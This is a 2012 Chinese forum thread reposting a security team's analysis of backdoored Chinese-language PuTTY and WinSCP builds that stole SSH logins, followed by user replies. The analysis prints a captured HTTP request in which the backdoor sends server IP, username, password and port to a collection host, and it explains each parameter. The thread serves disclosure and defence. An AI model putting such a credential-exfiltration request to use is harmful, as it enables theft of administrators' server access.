找回密码
 FreeOZ用户注册
查看: 2622|回复: 9
打印 上一主题 下一主题

[其他] 不要用中文版的putty

[复制链接]
跳转到指定楼层
1#
发表于 1-2-2012 20:58:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?FreeOZ用户注册

x
中文版putty后门事件分析
感谢lszm的投递
近几日,中文版putty等SSH远程管理工具被曝出存在后门,该后门会自动 窃取管理员所输入的SSH用户名与口令,并将其发送至指定服务器上。知道创宇安全研究小组在第一时间获取该消息后,对此次事件进行了跟踪和分析。根据分 析,此次事件涉及到来自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站点的中文版putty、 WinSCP、SSHSecure和psftp等软件,而这些软件的英文版本不受影响。


1.时间线
1月25日:新浪微博有网友发布消息称putty和winscp中装有后门程序,但该条微博并未提及后门程序的类型及其技术细节,而且消息也未被过多的人所重视,目前无法确定该条微博是否与此次事件有关联:

                               
登录/注册后可看大图

1月30日下午16点左右:互联网上再度出现关于中文版putty等SSH管理软件被装有后门的消息,并且此消息对后门的行为特征进行了简要的描述 —— 该程序会导致root密码丢失,但发布者仍未披露具体的技术细节:

                               
登录/注册后可看大图

以上微博的短URL所对应的文章截图如下:

                               
登录/注册后可看大图

1月31日:经过一晚的酝酿,putty事件开始在互联网上广泛传播,微博、论坛等信息发布平台上开始大量出现putty后门事件的消息,同时,很多技术人员也开始对含有后门的putty等SSH管理软件进行技术分析,并陆续发布其中的技术细节。
2.事件分析
2.1问题软件源头
知道创宇安全研究团队在获取信息后,第一时间对putty等软件进行了跟踪分析。通过分析发现,来自以下几个站点的中文版putty、WinSCP、SSHSecure和psftp等软件都可能存在后门程序:
http://www.putty.org.cn
http://www.putty.ws
http://www.winscp.cc
http://www.sshsecure.com

2.2行为分析
2.2.1网络行为分析
使用带有后门程序的中文版putty等SSH管理软件连接服务器时,程序会自动记录登录时的用户名、密码和服务器IP地址等信息,并会以HTTP的方式将这些信息发送到指定的服务器上,以下是在分析过程中抓取到的原始HTTP数据:
GET /yj33/js2.asp?act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Host: l.ip-163.com:88
Pragma: no-cache

从以上数据可以获得以下信息:
  • 敏感信息通过HTTP GET的方式发送到服务器l.ip-163.com上(经测试,该域名与putty.org.cn位于同一IP地址上)
  • 用于收集密码的程序地址为http:// l.ip-163.com:88/yj33/js2.asp
  • 敏感信息以GET参数的方式发送到服务器上,相关参数为:
act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY
每个字段的作用如下:
  •   act为执行的动作,参数add用于添加信息,经测试,也可使用del来删除信息
  •   user为SSH服务器的IP地址,此处为50.23.79.188
  •   pwd为连接服务器时的登录用户名,此处为abc
  •   ll1为登录密码,此处为pass
  •   ll2为目标服务器的SSH端口,此处为22(即,默认端口)
  •   ll3则为客户端类型,此处为PuTTY
2.2.2服务器本地文件分析
知道创宇安全研究团队借助文件完整性校验的方式,对服务器初始安全状态下的 /etc、/lib、/usr、/bin等敏感目录进行了完整性备份,并在putty连接测试后对这些目录的文件变更、丢失和添加等情况进行了校验,校验 结果显示,中文版putty并未对服务器自动安装后门程序。
网络上部分消息称,有些使用中文版putty进行过远程管理的服务器上出现恶意代码和文件,可能是由于恶意用户获取了putty所收集的密码后人为植入所致。
2.3事件后续
截止至2月1日,在本次事件中所涉及的以下域名均已不能访问:
http://www.putty.org.cn
http://putty.ws
http://www.winscp.cc
http://www.sshsecure.com
http://l.ip-163.com:88

但是,在1月31日晚,网络上传出“l.ip-163.com被黑”的消息并配有一张“受害者列表”的截图:

                               
登录/注册后可看大图

而就在此消息发布不久之后,互联网上便出现了完整的受害者列表供所有用户浏览和下载,根据这份来自互联网列表的显示,不但有众多政府网站位列其中,IBM、Oracle、HP等大厂商的服务器也出现在列表内。
3.安全建议
若您使用过中文版的putty、WinSCP、SSHSecure和psftp等软件,但暂时又不能对服务器进行下线处理,可采取以下临时解决方案来处理:
  • 使用chkrootkit或rootkit hunter对服务器进行扫描,检查是否存在已知后门
  • 查看网络是否有可疑外联,并加强对可疑外联的监控
  • 在网络层建立端口访问控制策略,阻止除正常业务外的一切非业务、非管理端口
  • 更换SSH登录密码,建议登录时使用证书加密码的组合方式进行身份验证
  • 登录SSH时,不要直接使用root用户,先使用普通用户登录后,再su至root
  • 服务器端通过TCP Wrapper或iptables等软件,限制IP访问,仅允许特定IP地址对服务器的SSH进行连接和管理
  • 如需使用putty、WinSCP等软件,可访问其官方站点下载:
http://www.putty.org/
http://winscp.net/eng/docs/lang:chs

评分

参与人数 1威望 +50 收起 理由
蓝山夜妖 + 50 谢谢分享!

查看全部评分

回复  

使用道具 举报

2#
发表于 1-2-2012 21:03:08 | 只看该作者
putty为毛要用中文的想不通

winscp也没用过中文的
回复  

使用道具 举报

3#
发表于 2-2-2012 08:59:20 | 只看该作者
这个有点可怕
putty一直是随身携带的工具
回复  

使用道具 举报

4#
发表于 2-2-2012 09:20:10 | 只看该作者
一直用的是官方上的英文PUTTY.幸运避过
回复  

使用道具 举报

5#
发表于 2-2-2012 10:22:58 | 只看该作者

回复 #1 coredump 的帖子

从来不用汉化软件
回复  

使用道具 举报

6#
发表于 2-2-2012 10:25:38 | 只看该作者
就那么几个单词也需要汉化,那也别搞计算机了。
回复  

使用道具 举报

7#
发表于 5-2-2012 00:53:43 | 只看该作者
apple aTV 很多人 用putty , 所以中文的还是有市场
回复  

使用道具 举报

8#
发表于 5-2-2012 14:07:34 | 只看该作者
工作上从未用过任何中文版的软件
回复  

使用道具 举报

9#
发表于 6-2-2012 11:05:53 | 只看该作者
在这混的同学估计不会有什么人用中文版的putty,国内还是有很多人用的。
而且这个事件的本质并不是语言
回复  

使用道具 举报

10#
发表于 7-2-2012 18:53:35 | 只看该作者
好像这几个软件(带后门的)在百度搜索上做了关键词广告,这个事情是挺让人恶心的,本来好好的putty和winscp,名声被破坏了。

不过,类似的问题也有可能发生在iPhone/iPad/Android等软件上,那些更涉及个人的隐私问题,还是老老实实用非越狱的iPhone/iPad吧。
回复  

使用道具 举报

您需要登录后才可以回帖 登录 | FreeOZ用户注册

本版积分规则

小黑屋|手机版|Archiver|FreeOZ论坛

GMT+11, 1-11-2024 16:42 , Processed in 0.017489 second(s), 26 queries , Gzip On, Redis On.

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表